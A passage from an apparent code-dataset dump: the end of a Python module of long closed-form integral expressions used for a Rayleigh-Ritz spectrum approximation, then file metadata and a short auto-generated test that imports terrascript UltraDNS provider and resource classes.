+ a * (a_conj + 2 * a_conj * b)
)
/ (
np.sqrt((a * a_conj + b) ** 2)
* np.sqrt(
a ** 2 * a_conj ** 2
+ (-1 + b) ** 2
+ 2 * a * a_conj * (1 + b)
)
)
)
)
+ 84
* a
* a_conj
* b
* (a ** 2 * a_conj ** 2 + (-1 + b) ** 2 + 2 * a * a_conj * (1 + b))
** 3
* np.arctanh(
(
a ** 2 * a_conj ** 2
+ b ** 2
- x ** 2
+ a * a_conj * (1 + 2 * b - x ** 2)
+ b * (-1 + x ** 2)
)
/ (
np.sqrt(
a ** 2 * a_conj ** 2
+ (-1 + b) ** 2
+ 2 * a * a_conj * (1 + b)
)
* np.sqrt(
(a * a_conj + b) ** 2
- 2 * (a * a_conj - b) * x ** 2
+ x ** 4
)
)
)
- 648
* a
* a_conj
* (1 + a * a_conj - b)
* b
* (a ** 2 * a_conj ** 2 + (-1 + b) ** 2 + 2 * a * a_conj * (1 + b))
** 2
* np.arctanh(
(
a ** 2 * a_conj ** 2
+ b ** 2
- x ** 2
+ a * a_conj * (1 + 2 * b - x ** 2)
+ b * (-1 + x ** 2)
)
/ (
np.sqrt(
a ** 2 * a_conj ** 2
+ (-1 + b) ** 2
+ 2 * a * a_conj * (1 + b)
)
* np.sqrt(
a ** 2 * a_conj ** 2
+ 2 * a * a_conj * (b - x ** 2)
+ (b + x ** 2) ** 2
)
)
)
- 960
* a
* a_conj
* b
* (
a ** 3 * a_conj ** 3
+ 3 * a ** 2 * a_conj ** 2 * (1 - 2 * b)
- (-1 + b) ** 3
+ 3 * a * a_conj * (1 - 3 * b + 2 * b ** 2)
)
* np.arctanh(
(
a ** 2 * a_conj ** 2
+ b ** 2
- x ** 2
+ a * a_conj * (1 + 2 * b - x ** 2)
+ b * (-1 + x ** 2)
)
/ (
np.sqrt(
a ** 2 * a_conj ** 2
+ (-1 + b) ** 2
+ 2 * a * a_conj * (1 + b)
)
* np.sqrt(
a ** 2 * a_conj ** 2
+ 2 * a * a_conj * (b - x ** 2)
+ (b + x ** 2) ** 2
)
)
)
- 1
/ (1 + x ** 2) ** 2
* (
60
* (
a ** 2 * a_conj ** 2
+ (-1 + b) ** 2
+ 2 * a * a_conj * (1 + b)
)
* (
(
a ** 2 * a_conj ** 2
+ a * a_conj * (2 - 8 * b)
+ (-1 + b) ** 2
)
* (1 + 2 * a * a_conj - 2 * b + (a * a_conj + b) ** 2)
** (3 / 2)
* np.sqrt(
(a * a_conj + b) ** 2
- 2 * (a * a_conj - b) * x ** 2
+ x ** 4
)
+ np.sqrt(
1 + 2 * a * a_conj - 2 * b + (a * a_conj + b) ** 2
)
* (
a ** 3 * a_conj ** 3
+ a ** 2 * a_conj ** 2 * (3 - 29 * b)
- (-1 + b) ** 3
+ a * a_conj * (3 - 32 * b + 29 * b ** 2)
)
* (1 + x ** 2)
* np.sqrt(
(a * a_conj + b) ** 2
- 2 * (a * a_conj - b) * x ** 2
+ x ** 4
)
- 24
* a
* a_conj
* (
a ** 2 * a_conj ** 2
+ a * a_conj * (2 - 3 * b)
+ (-1 + b) ** 2
)
* b
* (1 + x ** 2) ** 2
* np.arctanh(
(
a ** 2 * a_conj ** 2
+ b ** 2
- x ** 2
+ a * a_conj * (1 + 2 * b - x ** 2)
+ b * (-1 + x ** 2)
)
/ (
np.sqrt(
a ** 2 * a_conj ** 2
+ (-1 + b) ** 2
+ 2 * a * a_conj * (1 + b)
)
* np.sqrt(
a ** 2 * a_conj ** 2
+ 2 * a * a_conj * (b - x ** 2)
+ (b + x ** 2) ** 2
)
)
)
)
)
)
)
)
return -2 * np.pi * c * ret
if abs(a_conj) < 0.00000001:
ret = 0
return ret
def zzzz_integral(a, b, c, x):
"""
function involved in computing the a_matrix (Rayleigh Ritz approx of the spectrum)
@param a:
@param b:
@param c:
@param x:
@return:
"""
a_conj = np.conj(a)
if abs(a_conj) >= 0.00000001:
ret = (
1
/ (
12
* b
* (a * a_conj + b)
* (a ** 2 * a_conj ** 2 + (-1 + b) ** 2 + 2 * a * a_conj * (1 + b)) ** 4
)
* (
np.sqrt((a * a_conj + b) ** 2)
* (
3 * a ** 8 * a_conj ** 8
+ 24 * a ** 7 * a_conj ** 7 * b
+ 4 * a ** 6 * a_conj ** 6 * (-3 + 32 * b + 21 * b ** 2)
+ 8 * a ** 5 * a_conj ** 5 * b * (-95 + 96 * b + 21 * b ** 2)
+ 8
* a ** 3
* a_conj ** 3
* b
* (173 - 432 * b - 570 * b ** 2 + 320 * b ** 3 + 21 * b ** 4)
+ 2
* a ** 4
* a_conj ** 4
* (9 - 232 * b - 1490 * b ** 2 + 960 * b ** 3 + 105 * b ** 4)
+ (-1 + b) ** 3
* (
-3
+ 39 * b
+ 282 * b ** 2
+ 342 * b ** 3
+ 137 * b ** 4
+ 3 * b ** 5
)
+ 8
* a
* a_conj
* b
* (
-57
+ 216 * b
+ 261 * b ** 2
- 400 * b ** 3
- 119 * b ** 4
+ 96 * b ** 5
+ 3 * b ** 6
)
+ 4
* a ** 2
* a_conj ** 2
* (
-3
+ 144 * b
+ 1035 * b ** 2
- 1464 * b ** 3
- 805 * b ** 4
+ 480 * b ** 5
+ 21 * b ** 6
)
)
)
- 1
/ (
12
* (a ** 2 * a_conj ** 2 + (-1 + b) ** 2 + 2 * a * a_conj * (1 + b)) ** 4
)
* (
np.sqrt(
(a * a_conj + b) ** 2
- 2 * a * a_conj * x ** 2
+ 2 * b * x ** 2
+ x ** 4
)
* (
32
* (-1 + a * a_conj + b)
* (a ** 2 * a_conj ** 2 + (-1 + b) ** 2 + 2 * a * a_conj * (1 + b))
** 2
/ (1 + x ** 2) ** 3
- 32
* (a ** 2 * a_conj ** 2 + (-1 + b) ** 2 + 2 * a * a_conj * (1 + b))
* (
3 * a ** 3 * a_conj ** 3
+ (-1 + b) ** 2 * (1 + 3 * b)
+ a ** 2 * a_conj ** 2 * (-4 + 9 * b)
+ 3 * a * a_conj * (-2 - 3 * b + 3 * b ** 2)
)
/ (1 + x ** 2) ** 2
+ 16
* (
9 * a ** 5 * a_conj ** 5
+ 9 * a ** 4 * a_conj ** 4 * (-3 + 5 * b)
+ (-1 + b) ** 3 * (5 + 12 * b + 9 * b ** 2)
+ 2 * a ** 3 * a_conj ** 3 * (-23 - 48 * b + 45 * b ** 2)
+ 2
* a ** 2
* a_conj ** 2
* (10 - 66 * b - 63 * b ** 2 + 45 * b ** 3)
+ a
* a_conj
* (25 + 92 * b - 90 * b ** 2 - 72 * b ** 3 + 45 * b ** 4)
)
/ (1 + x ** 2)
+ 1
/ (
b
* (
a ** 2 * a_conj ** 2
+ 2 * a * a_conj * (b - x ** 2)
+ (b + x ** 2) ** 2
)
)
* (
3
* (
a ** 9 * a_conj ** 9
+ a ** 8 * a_conj ** 8 * (9 * b - x ** 2)
+ 4
* a ** 7
* a_conj ** 7
* (-1 + 9 * b ** 2 - 2 * b * (-2 + x ** 2))
+ 4
* a ** 6
* a_conj ** 6
* (
21 * b ** 3
+ x ** 2
- 7 * b ** 2 * (-4 + x ** 2)
+ b * (-31 + 4 * x ** 2)
)
+ 2
* a ** 5
* a_conj ** 5
* (
3
+ 63 * b ** 4
- 28 * b ** 3 * (-6 + x ** 2)
+ 12 * b * (-2 + 5 * x ** 2)
+ 6 * b ** 2 * (-47 + 8 * x ** 2)
)
+ (-1 + b ** 2) ** 3
* (
b ** 3
+ x ** 2
- b ** 2 * (-16 + x ** 2)
+ b * (-1 + 16 * x ** 2)
)
+ 4
* a ** 2
* a_conj ** 2
* (
9 * b ** 7
+ x ** 2
+ b ** 3 * (223 - 200 * x ** 2)
+ b ** 2 * (100 - 169 * x ** 2)
- 7 * b ** 6 * (-12 + x ** 2)
+ 3 * b * (-9 + 4 * x ** 2)
+ 3 * b ** 5 * (-47 + 20 * x ** 2)
+ 3 * b ** 4 * (-104 + 37 * x ** 2)
)
+ 4
* a ** 3
* a_conj ** 3
* (
-1
+ 21 * b ** 6
+ b ** 2 * (223 - 112 * x ** 2)
- 14 * b ** 5 * (-10 + x ** 2)
- 6 * b * (-2 + 9 * x ** 2)
+ 5 * b ** 4 * (-55 + 16 * x ** 2)
+ 4 * b ** 3 * (-78 + 41 * x ** 2)
)
+ a
* a_conj
* (-1 + b ** 2)
* (
-1
+ 9 * b ** 6
+ b ** 2 * (107 - 352 * x ** 2)
- 8 * b ** 5 * (-14 + x ** 2)
+ 16 * b ** 3 * (-24 + 7 * x ** 2)
- 8 * b * (-2 + 13 * x ** 2)
+ b ** 4 * (-115 + 96 * x ** 2)
)
+ 2
* a ** 4
* a_conj ** 4
* (
63 * b ** 5
- 3 * x ** 2
- 35 * b ** 4 * (-8 + x ** 2)
- 3 * b * (-37 + 8 * x ** 2)
+ 10 * b ** 3 * (-55 + 12 * x ** 2)
+ b ** 2 * (-248 + 222 * x ** 2)
)
)
)
)
)
- 4
* (1 + a * a_conj + b)
* (
a ** 6 * a_conj ** 6
+ (-1 + b) ** 4 * (1 + b) ** 2
+ 2 * a ** 5 * a_conj ** 5 * (-4 + 3 * b)
+ a ** 4 * a_conj ** 4 * (-1 - 34 * b + 15 * b ** 2)
+ 2
* a
* a_conj
* (-1 + b) ** 2
* (-4 - 21 * b - 2 * b ** 2 + 3 * b ** 3)
+ 4 * a ** 3 * a_conj ** 3 * (4 - 7 * b - 14 * b ** 2 + 5 * b ** 3)
+ a ** 2
* a_conj ** 2
* (-1 + 108 * b - 54 * b ** 2 - 44 * b ** 3 + 15 * b ** 4)
)
* np.log(
a * a_conj
- b
+ (a * a_conj + b) ** 2
+ np.sqrt((a * a_conj + b) ** 2)
* np.sqrt(1 + 2 * a * a_conj - 2 * b + (a * a_conj + b) ** 2)
)
/ (1 + 2 * a * a_conj - 2 * b + (a * a_conj + b) ** 2) ** (9 / 2)
- 4
* (1 + a * a_conj + b)
* (
a ** 6 * a_conj ** 6
+ (-1 + b) ** 4 * (1 + b) ** 2
+ 2 * a ** 5 * a_conj ** 5 * (-4 + 3 * b)
+ a ** 4 * a_conj ** 4 * (-1 - 34 * b + 15 * b ** 2)
+ 2
* a
* a_conj
* (-1 + b) ** 2
* (-4 - 21 * b - 2 * b ** 2 + 3 * b ** 3)
+ 4 * a ** 3 * a_conj ** 3 * (4 - 7 * b - 14 * b ** 2 + 5 * b ** 3)
+ a ** 2
* a_conj ** 2
* (-1 + 108 * b - 54 * b ** 2 - 44 * b ** 3 + 15 * b ** 4)
)
* np.log(1 + x ** 2)
/ (1 + 2 * a * a_conj - 2 * b + (a * a_conj + b) ** 2) ** (9 / 2)
+ 1
/ (1 + 2 * a * a_conj - 2 * b + (a * a_conj + b) ** 2) ** (9 / 2)
* (
4
* (1 + a * a_conj + b)
* (
a ** 6 * a_conj ** 6
+ (-1 + b) ** 4 * (1 + b) ** 2
+ 2 * a ** 5 * a_conj ** 5 * (-4 + 3 * b)
+ a ** 4 * a_conj ** 4 * (-1 - 34 * b + 15 * b ** 2)
+ 2
* a
* a_conj
* (-1 + b) ** 2
* (-4 - 21 * b - 2 * b ** 2 + 3 * b ** 3)
+ 4 * a ** 3 * a_conj ** 3 * (4 - 7 * b - 14 * b ** 2 + 5 * b ** 3)
+ a ** 2
* a_conj ** 2
* (-1 + 108 * b - 54 * b ** 2 - 44 * b ** 3 + 15 * b ** 4)
)
* np.log(
a ** 2 * a_conj ** 2
- b
+ b ** 2
- x ** 2
+ b * x ** 2
+ a * a_conj * (1 + 2 * b - x ** 2)
+ np.sqrt(
a ** 2 * a_conj ** 2 + (-1 + b) ** 2 + 2 * a * a_conj * (1 + b)
)
* np.sqrt(
a ** 2 * a_conj ** 2
+ 2 * a * a_conj * (b - x ** 2)
+ (b + x ** 2) ** 2
)
)
)
)
return 4 * np.pi * c * ret
if abs(a_conj) < 0.00000001 and (b - 1) ** 2 >= 0.00000001:
ret = (
16 * (-1 + b) ** 3
- 48 * (-1 + b) ** 2 * b
+ 3 * (-1 + b) * (1 + b) ** 4 / b
+ 24 * (-1 + b) * (1 + 2 * b + 3 * b ** 2)
- 16 * (-1 + b) ** 3 / (1 + x ** 2) ** 3
+ 48 * (-1 + b) ** 2 * b / (1 + x ** 2) ** 2
- 24 * (-1 + b) * (1 + 2 * b + 3 * b ** 2) / (1 + x ** 2)
- 3 * (-1 + b) * (1 + b) ** 4 / (b + x ** 2)
- 24 * (1 + b) ** 3 * np.log(b)
+ 24 * (1 + b) ** 3 * np.log(b + x ** 2)
- 24 * (1 + b) ** 3 * np.log(1 + x ** 2)
) / (6 * (-1 + b) ** 5)
return 4 * c * np.pi * ret
if abs(a_conj) < 0.00000001 and (b - 1) ** 2 < 0.00000001:
ret = x ** 2 * (x ** 8 + 10 * x ** 4 + 5) / (10 * (x ** 2 + 1) ** 5)
return 4 * c * np.pi * ret
def xxxz_integral(a, b, c, x):
"""
function involved in computing the a_matrix (Rayleigh Ritz approx of the spectrum)
@param a:
@param b:
@param c:
@param x:
@return:
"""
a_conj = np.conj(a)
if abs(a_conj) >= 0.00000001:
ret = (
1
/ 12
* (a + a_conj)
* (
-(6 * (a ** 2 - a * a_conj + a_conj ** 2) / (a ** 3 * a_conj ** 3))
- 3
* (a ** 2 - a * a_conj + a_conj ** 2)
* (-3 + a * a_conj + b)
/ (a ** 3 * a_conj ** 3)
+ 4
* (a ** 2 - a * a_conj + a_conj ** 2)
* (-1 + a * a_conj + b)
/ (a ** 3 * a_conj ** 3)
- 1
/ (
a ** 3
* a_conj ** 3
* b
* (a ** 2 * a_conj ** 2 + (-1 + b) ** 2 + 2 * a * a_conj * (1 + b))
** 4
)
* (
np.sqrt((a * a_conj + b) ** 2)
* (
a ** 10 * a_conj ** 8 * b
+ a_conj ** 2 * (-3 + b) * (-1 + b) ** 6 * b ** 2
+ a ** 9
* a_conj ** 7
* (3 - (-7 + a_conj ** 2) * b + 8 * b ** 2)
+ a ** 8
* a_conj ** 6
* (
9
+ 23 * b
+ a_conj ** 4 * b
+ 33 * b ** 2
+ 28 * b ** 3
+ a_conj ** 2 * (6 - 7 * b - 8 * b ** 2)
)
- a
* a_conj
* (-3 + b)
* (-1 + b) ** 4
* b
* ((-1 + b) ** 2 * b - a_conj ** 2 * (2 + 9 * b + 8 * b ** 2))
+ a ** 7
* a_conj ** 5
* (
6
+ 298 * b
+ 13 * b ** 2
+ 51 * b ** 3
+ 56 * b ** 4
+ a_conj ** 4 * (3 + 7 * b + 8 * b ** 2)
- a_conj ** 2 * (-18 + 119 * b + 33 * b ** 2 + 28 * b ** 3)
)
+ a ** 6
* a_conj ** 4
* (
-6
+ 473 * b
+ 419 * b ** 2
- 85 * b ** 3
+ 5 * b ** 4
+ 70 * b ** 5
+ a_conj ** 4 * (9 + 23 * b + 33 * b ** 2 + 28 * b ** 3)
+ a_conj ** 2
* (12 + 113 * b - 478 * b ** 2 - 51 * b ** 3 - 56 * b ** 4)
)
+ a ** 2
* (
(-3 + b) * (-1 + b) ** 6 * b ** 2
- a_conj ** 2
* (-1 + b) ** 4
* b
* (-15 - 34 * b - 15 * b ** 2 + 8 * b ** 3)
+ a_conj ** 4
* (-1 + b) ** 2
* (
-3
- 95 * b
- 152 * b ** 2
- 89 * b ** 3
- 37 * b ** 4
+ 28 * b ** 5
)
)
+ a ** 5
* a_conj ** 3
* (
-9
+ 109 * b
+ 720 * b ** 2
+ 82 * b ** 3
- 115 * b ** 4
- 75 * b ** 5
+ 56 * b ** 6
+ a_conj ** 4
* (6 + 298 * b + 13 * b ** 2 + 51 * b ** 3 + 56 * b ** 4)
- a_conj ** 2
* (
12
- 349 * b
+ 35 * b ** 2
+ 635 * b ** 3
+ 5 * b ** 4
+ 70 * b ** 5
)
)
+ a ** 3
* (
a_conj
* (-1 + b) ** 4
* b
* (-6 - 25 * b - 15 * b ** 2 + 8 * b ** 3)
- a_conj ** 3
* (-1 + b) ** 2
* (
6
+ 193 * b
+ 451 * b ** 2
+ 7 * b ** 3
- 37 * b ** 4
+ 28 * b ** 5
)
+ a_conj ** 5
* (
-9
+ 109 * b
+ 720 * b ** 2
+ 82 * b ** 3
- 115 * b ** 4
- 75 * b ** 5
+ 56 * b ** 6
)
)
+ a ** 4
* (
a_conj ** 2
* (-1 + b) ** 2
* (
-3
- 95 * b
- 152 * b ** 2
- 89 * b ** 3
- 37 * b ** 4
+ 28 * b ** 5
)
+ a_conj ** 6
* (
-6
+ 473 * b
+ 419 * b ** 2
- 85 * b ** 3
+ 5 * b ** 4
+ 70 * b ** 5
)
- a_conj ** 4
* (
18
+ 73 * b
- 888 * b ** 2
+ 466 * b ** 3
+ 350 * b ** 4
- 75 * b ** 5
+ 56 * b ** 6
)
)
)
)
- 4
* (a ** 2 - a * a_conj + a_conj ** 2)
* (-1 + a * a_conj + b)
/ (a ** 3 * a_conj ** 3 * (1 + x ** 2) ** 3)
+ 3
* (a ** 2 - a * a_conj + a_conj ** 2)
* (-3 + a * a_conj + b)
/ (a ** 3 * a_conj ** 3 * (1 + x ** 2) ** 2)
+ 6
* (a ** 2 - a * a_conj + a_conj ** 2)
/ (a ** 3 * a_conj ** 3 * (1 + x ** 2))
+ 1
/ (
a ** 3
* a_conj ** 3
* (1 + 2 * a * a_conj - 2 * b + (a * a_conj + b) ** 2) ** 4
)
* (
np.sqrt(
(a * a_conj + b) ** 2
- 2 * a * a_conj * x ** 2
+ 2 * b * x ** 2
+ x ** 4
)
* (
1
/ (1 + x ** 2) ** 3
* (
4
* (
a ** 2 * a_conj ** 2
+ (-1 + b) ** 2
+ 2 * a * a_conj * (1 + b)
)
** 2
* (
a ** 6 * a_conj ** 4
+ a_conj ** 2 * (-1 + b) ** 4
+ a ** 5 * a_conj ** 3 * (2 - a_conj ** 2 + 4 * b)
+ a ** 4
* (
a_conj ** 6
+ 6 * a_conj ** 2 * b ** 2
- 2 * a_conj ** 4 * (1 + 2 * b)
)
+ a ** 2
* (
(-1 + b) ** 4
+ 6 * a_conj ** 4 * b ** 2
- 2 * a_conj ** 2 * (-1 + b) ** 2 * (1 + 2 * b)
)
+ a
* (
-a_conj * (-1 + b) ** 4
+ a_conj ** 3 * (-1 + b) ** 2 * (2 + 4 * b)
)
+ 2
* a ** 3
* (
a_conj ** 5 * (1 + 2 * b)
+ a_conj * (-1 + b) ** 2 * (1 + 2 * b)
- 3 * a_conj ** 3 * (1 + b ** 2)
)
)
)
- 1
/ (1 + x ** 2) ** 2
* (
(
a ** 2 * a_conj ** 2
+ (-1 + b) ** 2
+ 2 * a * a_conj * (1 + b)
)
* (
3 * a ** 8 * a_conj ** 6
+ a_conj ** 2 * (-1 + b) ** 5 * (-5 + 3 * b)
+ a ** 7 * a_conj ** 5 * (2 - 3 * a_conj ** 2 + 18 * b)
+ a
* (
-a_conj * (-1 + b) ** 5 * (-5 + 3 * b)
+ 6
* a_conj ** 3
* (-1 + b) ** 3
* (-5 - 4 * b + 3 * b ** 2)
)
+ a ** 6
* (
3 * a_conj ** 8
- 2 * a_conj ** 6 * (1 + 9 * b)
+ 3 * a_conj ** 4 * (-9 - 4 * b + 15 * b ** 2)
)
+ a ** 5
* a_conj ** 3
* (
16
- 68 * b
- 68 * b ** 2
+ 60 * b ** 3
+ 2 * a_conj ** 4 * (1 + 9 * b)
- 3 * a_conj ** 2 * (21 - 4 * b + 15 * b ** 2)
)
+ a ** 4
* a_conj ** 2
* (
67
- 112 * b ** 3
+ 45 * b ** 4
+ 3 * a_conj ** 4 * (-9 - 4 * b + 15 * b ** 2)
- 4
* a_conj ** 2
* (16 + 28 * b - 17 * b ** 2 + 15 * b ** 3)
)
+ a ** 3
* (
6
* a_conj
* (-1 + b) ** 3
* (-5 - 4 * b + 3 * b ** 2)
+ 4
* a_conj ** 5
* (4 - 17 * b - 17 * b ** 2 + 15 * b ** 3)
+ a_conj ** 3
* (
-25
+ 48 * b
- 90 * b ** 2
+ 112 * b ** 3
- 45 * b ** 4
)
)
+ a ** 2
* (
(-1 + b) ** 5 * (-5 + 3 * b)
- 6
* a_conj ** 2
* (-1 + b) ** 3
* (-5 - 4 * b + 3 * b ** 2)
+ a_conj ** 4 * (67 - 112 * b ** 3 + 45 * b ** 4)
)
)
)
+ 1
/ (1 + x ** 2)
* (
-9 * a ** 9 * a_conj ** 7
+ a ** 8 * a_conj ** 6 * (-47 + 9 * a_conj ** 2 - 57 * b)
+ a * a_conj * (-1 + b) ** 6 * (-1 + 3 * b)
- a_conj ** 2 * (-1 + b) ** 6 * (-1 + 3 * b)
- a
* a_conj ** 3
* (-1 + b) ** 4
* (-7 + 24 * b + 27 * b ** 2)
- a ** 7
* a_conj ** 5
* (
-115
+ 9 * a_conj ** 4
+ a_conj ** 2 * (97 - 57 * b)
+ 180 * b
+ 153 * b ** 2
)
- a ** 6
* a_conj ** 4
* (
-353
- 259 * b
+ 231 * b ** 2
+ 225 * b ** 3
+ a_conj ** 4 * (47 + 57 * b)
+ a_conj ** 2 * (61 + 396 * b - 153 * b ** 2)
)
+ a ** 2
* (
-((-1 + b) ** 6) * (-1 + 3 * b)
+ a_conj ** 2
* (-1 + b) ** 4
* (-7 + 24 * b + 27 * b ** 2)
- a_conj ** 4
* (-1 + b) ** 2
* (-29 + 35 * b + 99 * b ** 2 + 99 * b ** 3)
)
+ a ** 5
* a_conj ** 3
* (
223
+ 492 * b
+ 216 * b ** 2
- 64 * b ** 3
- 195 * b ** 4
+ a_conj ** 4 * (115 - 180 * b - 153 * b ** 2)
+ a_conj ** 2
* (109 - 205 * b - 633 * b ** 2 + 225 * b ** 3)
)
+ a ** 4
* a_conj ** 2
* (
29
- 93 * b
+ 64 * b ** 3
+ 99 * b ** 4
- 99 * b ** 5
+ a_conj ** 4
* (353 + 259 * b - 231 * b ** 2 - 225 * b ** 3)
+ a_conj ** 2
* (
-37
+ 432 * b
- 270 * b ** 2
- 512 * b ** 3
+ 195 * b ** 4
)
)
- a ** 3
* (
a_conj * (-1 + b) ** 4 * (-7 + 24 * b + 27 * b ** 2)
- a_conj ** 3
* (-1 + b) ** 2
* (-107 - 307 * b - 45 * b ** 2 + 99 * b ** 3)
+ a_conj ** 5
* (
-223
- 492 * b
- 216 * b ** 2
+ 64 * b ** 3
+ 195 * b ** 4
)
)
)
+ 1
/ (
b
* (
a ** 2 * a_conj ** 2
+ 2 * a * a_conj * (b - x ** 2)
+ (b + x ** 2) ** 2
)
)
* (
3
* a
* a_conj
* (a + a_conj) ** 2
* (
a ** 8 * a_conj ** 8
- a ** 7 * a_conj ** 7 * (-3 + x ** 2)
+ (-1 + b) ** 4 * b ** 2 * (1 + b) * (b + x ** 2)
+ a ** 6
* a_conj ** 6
* (2 - 20 * b ** 2 - 3 * x ** 2 + b * (31 - 5 * x ** 2))
+ a
* a_conj
* (-1 + b) ** 2
* b
* (
b
- 6 * x ** 2
- 31 * b * x ** 2
+ b ** 3 * (-31 + 5 * x ** 2)
- 2 * b ** 2 * (9 + 8 * x ** 2)
)
- a ** 5
* a_conj ** 5
* (
64 * b ** 3
+ 2 * (1 + x ** 2)
+ b ** 2 * (-75 + 9 * x ** 2)
+ b * (-44 + 26 * x ** 2)
)
- a ** 3
* a_conj ** 3
* (
1
+ 64 * b ** 5
- 3 * x ** 2
+ b * (20 - 40 * x ** 2)
+ b ** 4 * (47 - 5 * x ** 2)
+ 4 * b ** 2 * (1 + x ** 2)
+ 4 * b ** 3 * (-58 + 27 * x ** 2)
)
+ a ** 2
* a_conj ** 2
* (
-20 * b ** 6
+ x ** 2
+ b ** 4 * (158 - 77 * x ** 2)
+ 4 * b ** 3 * (1 + x ** 2)
+ b ** 5 * (-75 + 9 * x ** 2)
+ b * (-1 + 19 * x ** 2)
+ b ** 2 * (-34 + 76 * x ** 2)
)
- a ** 4
* a_conj ** 4
* (
3
+ 90 * b ** 4
- 2 * x ** 2
+ 6 * b * (1 + x ** 2)
+ b ** 3 * (-47 + 5 * x ** 2)
+ b ** 2 * (-158 + 77 * x ** 2)
)
)
)
)
)
- 1
/ (1 + 2 * a * a_conj - 2 * b + (a * a_conj + b) ** 2) ** (9 / 2)
* (
12
* (-1 + a * a_conj + b)
* (1 + a * a_conj + b)
* (
a ** 4 * a_conj ** 2 * (-10 + 3 * a_conj ** 2)
- 10 * a_conj ** 2 * (1 + 5 * b + b ** 2)
+ 3 * (-1 + b) ** 2 * (1 + 8 * b + b ** 2)
- 4
* a
* a_conj
* (
2
+ 13 * b
- 7 * b ** 2
- 3 * b ** 3
+ 5 * a_conj ** 2 * (1 + b)
)
+ 4
* a ** 3
* (-5 * a_conj * (1 + b) + a_conj ** 3 * (-2 + 3 * b))
- 2
* a ** 2
* (
5 * a_conj ** 4
+ 5 * (1 + 5 * b + b ** 2)
- a_conj ** 2 * (-11 + b + 9 * b ** 2)
)
)
* np.log(
a * a_conj
- b
+ (a * a_conj + b) ** 2
+ np.sqrt((a * a_conj + b) ** 2)
* np.sqrt(1 + 2 * a * a_conj - 2 * b + (a * a_conj + b) ** 2)
)
)
- 1
/ (1 + 2 * a * a_conj - 2 * b + (a * a_conj + b) ** 2) ** (9 / 2)
* (
12
* (-1 + a * a_conj + b)
* (1 + a * a_conj + b)
* (
a ** 4 * a_conj ** 2 * (-10 + 3 * a_conj ** 2)
- 10 * a_conj ** 2 * (1 + 5 * b + b ** 2)
+ 3 * (-1 + b) ** 2 * (1 + 8 * b + b ** 2)
- 4
* a
* a_conj
* (
2
+ 13 * b
- 7 * b ** 2
- 3 * b ** 3
+ 5 * a_conj ** 2 * (1 + b)
)
+ 4
* a ** 3
* (-5 * a_conj * (1 + b) + a_conj ** 3 * (-2 + 3 * b))
- 2
* a ** 2
* (
5 * a_conj ** 4
+ 5 * (1 + 5 * b + b ** 2)
- a_conj ** 2 * (-11 + b + 9 * b ** 2)
)
)
* np.log(1 + x ** 2)
)
+ 1
/ (1 + 2 * a * a_conj - 2 * b + (a * a_conj + b) ** 2) ** (9 / 2)
* (
12
* (-1 + a * a_conj + b)
* (1 + a * a_conj + b)
* (
a ** 4 * a_conj ** 2 * (-10 + 3 * a_conj ** 2)
- 10 * a_conj ** 2 * (1 + 5 * b + b ** 2)
+ 3 * (-1 + b) ** 2 * (1 + 8 * b + b ** 2)
- 4
* a
* a_conj
* (
2
+ 13 * b
- 7 * b ** 2
- 3 * b ** 3
+ 5 * a_conj ** 2 * (1 + b)
)
+ 4
* a ** 3
* (-5 * a_conj * (1 + b) + a_conj ** 3 * (-2 + 3 * b))
- 2
* a ** 2
* (
5 * a_conj ** 4
+ 5 * (1 + 5 * b + b ** 2)
- a_conj ** 2 * (-11 + b + 9 * b ** 2)
)
)
* np.log(
a * a_conj
- b
+ (a * a_conj + b) ** 2
- x ** 2
- a * a_conj * x ** 2
+ b * x ** 2
+ np.sqrt(1 + 2 * a * a_conj - 2 * b + (a * a_conj + b) ** 2)
* np.sqrt(
a ** 2 * a_conj ** 2
+ 2 * a * a_conj * (b - x ** 2)
+ (b + x ** 2) ** 2
)
)
)
)
)
return 4 * np.pi * c * ret
if abs(a_conj) < 0.00000001:
return 0
| 40.294661 | 113 | 0.156477 | 19,779 | 218,115 | 1.617473 | 0.023055 | 0.230683 | 0.093586 | 0.041792 | 0.842023 | 0.795386 | 0.736184 | 0.675419 | 0.645505 | 0.610434 | 0 | 0.187542 | 0.714637 | 218,115 | 5,412 | 114 | 40.302106 | 0.326452 | 0.019756 | 0 | 0.642029 | 0 | 0 | 0.000211 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.004914 | false | 0 | 0.000786 | 0 | 0.015923 | 0 | 0 | 0 | 1 | null | 1 | 0 | 0 | 1 | 1 | 1 | 0 | 0 | 1 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 8 |
96237664eec4f60579142872bf232052d8e14ac1 | 1,095 | py | Python | tests/test_provider_davidji99_ultradns.py | mjuenema/python-terrascript | 6d8bb0273a14bfeb8ff8e950fe36f97f7c6e7b1d | [
"BSD-2-Clause"
] | 507 | 2017-07-26T02:58:38.000Z | 2022-01-21T12:35:13.000Z | tests/test_provider_davidji99_ultradns.py | mjuenema/python-terrascript | 6d8bb0273a14bfeb8ff8e950fe36f97f7c6e7b1d | [
"BSD-2-Clause"
] | 135 | 2017-07-20T12:01:59.000Z | 2021-10-04T22:25:40.000Z | tests/test_provider_davidji99_ultradns.py | mjuenema/python-terrascript | 6d8bb0273a14bfeb8ff8e950fe36f97f7c6e7b1d | [
"BSD-2-Clause"
] | 81 | 2018-02-20T17:55:28.000Z | 2022-01-31T07:08:40.000Z | # tests/test_provider_davidji99_ultradns.py
# Automatically generated by tools/makecode.py (24-Sep-2021 15:29:41 UTC)
def test_provider_import():
import terrascript.provider.davidji99.ultradns
def test_resource_import():
from terrascript.resource.davidji99.ultradns import ultradns_dirpool
from terrascript.resource.davidji99.ultradns import ultradns_probe_http
from terrascript.resource.davidji99.ultradns import ultradns_probe_ping
from terrascript.resource.davidji99.ultradns import ultradns_rdpool
from terrascript.resource.davidji99.ultradns import ultradns_record
from terrascript.resource.davidji99.ultradns import ultradns_tcpool
# TODO: Shortcut imports without namespace for official and supported providers.
# TODO: This has to be moved into a required_providers block.
# def test_version_source():
#
# import terrascript.provider.davidji99.ultradns
#
# t = terrascript.provider.davidji99.ultradns.ultradns()
# s = str(t)
#
# assert 'https://github.com/davidji99/terraform-provider-ultradns' in s
# assert '2.1.0' in s
